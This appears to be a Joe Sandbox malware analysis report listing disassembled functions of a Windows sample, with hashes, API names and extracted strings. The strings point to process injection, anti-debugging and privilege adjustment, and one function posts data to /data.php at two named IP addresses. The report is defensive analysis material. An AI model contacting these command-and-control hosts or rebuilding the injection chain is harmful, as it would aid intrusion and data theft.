                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3920101602-0
                                                                                        • Opcode ID: f99d0651fdf556c9b584e72e4d5c1ff9382a0391580ff3d2c9f68253d8046eac
                                                                                        • Instruction ID: f70cdb8b8eac9ad150c43c8d9f894e4465e47b76109bfc29a578fe30918e3f7b
                                                                                        • Opcode Fuzzy Hash: f99d0651fdf556c9b584e72e4d5c1ff9382a0391580ff3d2c9f68253d8046eac
                                                                                        • Instruction Fuzzy Hash: 8BF08C21A2C192C5EBB04B70B80C33E67E0BB65B08F608174F58DC6296CF2CD50CEB61
                                                                                        Function 00007FF60E612FDC Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionViewwcsnlen
                                                                                        • String ID:
                                                                                        • API String ID: 4106997571-0
                                                                                        • Opcode ID: ffb3091b6b3d5a123d30ae2daab49e37f26347fd6e0e5609431d118b62138c83
                                                                                        • Instruction ID: 90d053772cf2316469ecb0839783dcacd8a5934bfeff3155215f3e097cfc7c51
                                                                                        • Opcode Fuzzy Hash: ffb3091b6b3d5a123d30ae2daab49e37f26347fd6e0e5609431d118b62138c83
                                                                                        • Instruction Fuzzy Hash: 8231A03252C79582DB61CB51F4443AAA7E0FB95380F544075F68E83B69DF3CD505DB00
                                                                                        Function 00007FF60E62DFBC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: 0d76b06add167d4cf6fec4a5d31fc7408f5b7e96f421476ee3b93fcabe3639bc
                                                                                        • Instruction ID: 6d57ebc4320aaaf3ac0e363a98688404d93986cc401a8516136e8eadf8ce0ec6
                                                                                        • Opcode Fuzzy Hash: 0d76b06add167d4cf6fec4a5d31fc7408f5b7e96f421476ee3b93fcabe3639bc
                                                                                        • Instruction Fuzzy Hash: D2E00276A19F8582C6609B15F84401EB7B4F7D9794FA04125EACD82B39DF3CC665CB04
                                                                                        Function 00007FF60E611F38 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: e11c399d1a09d423e86982617f7fb185bfad691a7c7991c7f7845112d7df3d18
                                                                                        • Instruction ID: 89ee6ca87d7963023003af832d9c7dd1b0ddfbcdface909cdb3a7888196fd9fb
                                                                                        • Opcode Fuzzy Hash: e11c399d1a09d423e86982617f7fb185bfad691a7c7991c7f7845112d7df3d18
                                                                                        • Instruction Fuzzy Hash: 87314B2252CBD185DA618B51F45036EB7A4FBA6784F245075FACD83B6ADF3DD044AB00
                                                                                        Function 00007FF60E612174 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 49a6239eca554bde6359bdab4bfc5be76872e352b47871b1d5bcaa8b0cd124c4
                                                                                        • Instruction ID: 9bf76d49d87514ee5c8834a4197c633467da90ff55899ecec9669be674555f36
                                                                                        • Opcode Fuzzy Hash: 49a6239eca554bde6359bdab4bfc5be76872e352b47871b1d5bcaa8b0cd124c4
                                                                                        • Instruction Fuzzy Hash: 86D05B61E3CA91C1D754DB01F49531A6360FBE4780F505075FB8A42678CF3CC054AB00
                                                                                        Function 00007FF60E6302B0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E62FBD9), ref: 00007FF60E6302CC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: b57c225955378cc017116ab47c09997866f2df82083688e7948c599840e0e8e3
                                                                                        • Instruction ID: fce24ec9a3097e31bcc1423c22ca045c554b0ddab8f835bb0d4900cc61e16dfc
                                                                                        • Opcode Fuzzy Hash: b57c225955378cc017116ab47c09997866f2df82083688e7948c599840e0e8e3
                                                                                        • Instruction Fuzzy Hash: 76C01271F2515083D71C9B21E451A0A2A20A754744F904028E60147785CD3DC2518F00
                                                                                        Function 00007FF60E630280 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 092c94a0028451cec1867d66aa68a9feed987baf5a0f91e012113381deae6093
                                                                                        • Instruction ID: abd7977cb2bb937e20ad7b3bf94e7a3a1096cf0cec850dee30ef4feb685a7cb2
                                                                                        • Opcode Fuzzy Hash: 092c94a0028451cec1867d66aa68a9feed987baf5a0f91e012113381deae6093
                                                                                        • Instruction Fuzzy Hash: 52D01221F38D9281EB94DB26F88971962A0FFD4740F609035F58981968CF3CC099CF00

                                                                                        Non-executed Functions

                                                                                        Function 00007FF60E62F204 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 445COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                        • API String ID: 514040917-3001742581
                                                                                        • Opcode ID: b908c4bbb58855851690610d9eaba40de91e681cb9da683074f69fec9867cf37
                                                                                        • Instruction ID: 9333841f8c07346ed0ef616f7bbbc3bded111eda82fbe34c2b16582e547b7604
                                                                                        • Opcode Fuzzy Hash: b908c4bbb58855851690610d9eaba40de91e681cb9da683074f69fec9867cf37
                                                                                        • Instruction Fuzzy Hash: 5B32D932718A9186E7A0CB15F45436AB7A1FBA4B84F50813AFA8DC3B69DF3CD444DB40
                                                                                        Function 00007FF60E611B30 Relevance: 34.7, APIs: 23, Instructions: 169nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseHandleResume$Suspend
                                                                                        • String ID:
                                                                                        • API String ID: 4073281515-0
                                                                                        • Opcode ID: dd1db8065b8b72934f9a832ddd55b7f2970ebeaf73aedca523161806716b0cef
                                                                                        • Instruction ID: f86e7bca3f72683693a19e16ceb2b2d63f50aedaf8fb3b8a8745c7487cca6423
                                                                                        • Opcode Fuzzy Hash: dd1db8065b8b72934f9a832ddd55b7f2970ebeaf73aedca523161806716b0cef
                                                                                        • Instruction Fuzzy Hash: E091067261CA91C6E721CB55F49436EB7A0FB95B80F640036FA8E87AA8DF7CD444DB00
                                                                                        Function 00007FF60E633B98 Relevance: 21.1, APIs: 14, Instructions: 146COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl_invoke_watson
                                                                                        • String ID:
                                                                                        • API String ID: 411824461-0
                                                                                        • Opcode ID: 564419ca50e371d3acc34bb99ed49dc042e36028f0c6e1de800d56395efabe84
                                                                                        • Instruction ID: 0ccef005a1e64222b6f832f1d94e696cf7becb209634b773dd51ac02e579c2a8
                                                                                        • Opcode Fuzzy Hash: 564419ca50e371d3acc34bb99ed49dc042e36028f0c6e1de800d56395efabe84
                                                                                        • Instruction Fuzzy Hash: 64511611B382B345FA609A76B9117BAA2C16FB5BC4F245035FE1DDBB86DE3CE401A700
                                                                                        Function 00007FF60E6110D4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: OpenProcess
                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                        • API String ID: 3743895883-721857904
                                                                                        • Opcode ID: 997f9696530ca3d2e2a924b5a8e3b77fe72128a8fbc0c0d691b2ed488240cbf6
                                                                                        • Instruction ID: 33cb69b7512aa659ac1983a3ebef086a5e3f08dbd6dae56305d0d74f4d3773f4
                                                                                        • Opcode Fuzzy Hash: 997f9696530ca3d2e2a924b5a8e3b77fe72128a8fbc0c0d691b2ed488240cbf6
                                                                                        • Instruction Fuzzy Hash: 4A714932A1DB9586E7608B91F44436EB7A0FBA5780F644135F68DC2AA8DF7CD484EB00
                                                                                        Function 00007FF60E6124E8 Relevance: 10.6, APIs: 7, Instructions: 137memoryinjectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocMemoryProcessVirtualWrite
                                                                                        • String ID:
                                                                                        • API String ID: 645232735-0
                                                                                        • Opcode ID: 9846827d6b8e06299e9a05d4f878c346567fa6bf18a5ac3c9d23b35c2b6f147d
                                                                                        • Instruction ID: 9230fde7bd88c47e166ab82926a89ddbd57c3f4787b9c3a1dddcf6d2b3112a2d
                                                                                        • Opcode Fuzzy Hash: 9846827d6b8e06299e9a05d4f878c346567fa6bf18a5ac3c9d23b35c2b6f147d
                                                                                        • Instruction Fuzzy Hash: 5871E636618B5586DB51CB1AF49032AABA1F799BC4F144075FA8D83B68DF3CE440EB40
                                                                                        Function 00007FF60E6133F8 Relevance: 7.6, APIs: 5, Instructions: 50nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$ErrorFreeHeapInformationLastQuerySystem_errnomalloc
                                                                                        • String ID:
                                                                                        • API String ID: 76496729-0
                                                                                        • Opcode ID: 5a7b4308a923f00615bebbf7bced7e92388ca8185c8d29abf5f0f076eaa07afc
                                                                                        • Instruction ID: 6629c3f523fc71915324462bfdd19cbac7e6b40658f0ae962cac4c938a3f1ef4
                                                                                        • Opcode Fuzzy Hash: 5a7b4308a923f00615bebbf7bced7e92388ca8185c8d29abf5f0f076eaa07afc
                                                                                        • Instruction Fuzzy Hash: F3213C7293C661C6E7729B50F04472AB2A0FBA4348F240175F68F86799CF7CD584DB04
                                                                                        Function 00007FF60E62EC18 Relevance: 59.7, APIs: 24, Strings: 10, Instructions: 163networksleepstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectSendSleepstrlen
                                                                                        • String ID: /data.php$185.81.68.147$185.81.68.148$Content-Type: application/x-www-form-urlencodedConnection: close$Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$POST$data=$err$err$err
                                                                                        • API String ID: 2240106504-3235050614
                                                                                        • Opcode ID: 28471d85fd49d0bd5f3af11c198ae44d0fa0b724d49c512276e690abd95f61e1
                                                                                        • Instruction ID: 2b9201334288a65ee6c3c19d5619c085a64173c37d68db858d799aaba0aa32a5
                                                                                        • Opcode Fuzzy Hash: 28471d85fd49d0bd5f3af11c198ae44d0fa0b724d49c512276e690abd95f61e1
                                                                                        • Instruction Fuzzy Hash: 0091EB7262CA5286E750CB15F49476AB7A0FBE5794F60003AFA8D83B68DF7DD844DB00
                                                                                        Function 00007FF60E62EF58 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF60E62EF95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                        • API String ID: 4279794846-2771526726
                                                                                        • Opcode ID: c286b5aeaee3a95e6f793a4cad3823bc7d6503c806200300204d2a70b13d1204
                                                                                        • Instruction ID: cfa6140504a1c1501a626aad74857e64d85f95f5036741eae43c446e87f6ffc8
                                                                                        • Opcode Fuzzy Hash: c286b5aeaee3a95e6f793a4cad3823bc7d6503c806200300204d2a70b13d1204
                                                                                        • Instruction Fuzzy Hash: 7271E772628A9186E7508B15F85872EB770FBE5B94F605039FA8E83B58CF7DD844DB00
                                                                                        Function 00007FF60E612314 Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 65libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: NtClose$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtSetInformationFile$NtSetInformationProcess$NtWriteFile$RtlAdjustPrivilege$RtlInitUnicodeString$ntdll.dll
                                                                                        • API String ID: 2449869053-1333963010
                                                                                        • Opcode ID: 3b84ecef7e8c75bcd1d12f9525db118f6743ea869c907afc9188f40934af8a68
                                                                                        • Instruction ID: 885738390cccd6253f39901ca6f9b80f938fc45708de93416d5412735d20b426
                                                                                        • Opcode Fuzzy Hash: 3b84ecef7e8c75bcd1d12f9525db118f6743ea869c907afc9188f40934af8a68
                                                                                        • Instruction Fuzzy Hash: 8141ABA6939A22C1E6628B04F86837933B0FF74745F644137F49EC2675DF7CA588E240
                                                                                        Function 00007FF60E6117C4 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 161libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$FreeInitStringUnicode$AddressDirectoryProc$BlockCreateCurrentEnvironmentLoadSystemwcsnlen
                                                                                        • String ID: Diamotrixed!$NtCurrentPeb$RtlCreateProcessParametersEx$ntdll.dll
                                                                                        • API String ID: 1477408737-2287811734
                                                                                        • Opcode ID: 16a03e98275a15fa7fbf00527d921ee2a87b4c912d7ee25d9fcad31013e44fa4
                                                                                        • Instruction ID: 3eb5bb1aef21205671e3438b1ed1e9222a7a5ddf901af9523862d0a99058a725
                                                                                        • Opcode Fuzzy Hash: 16a03e98275a15fa7fbf00527d921ee2a87b4c912d7ee25d9fcad31013e44fa4
                                                                                        • Instruction Fuzzy Hash: 66913E72629BD582EB71CB24F4543AAB3A1FB95780F504036E68D83B69EF7CD148DB00
                                                                                        Function 00007FF60E62DA34 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
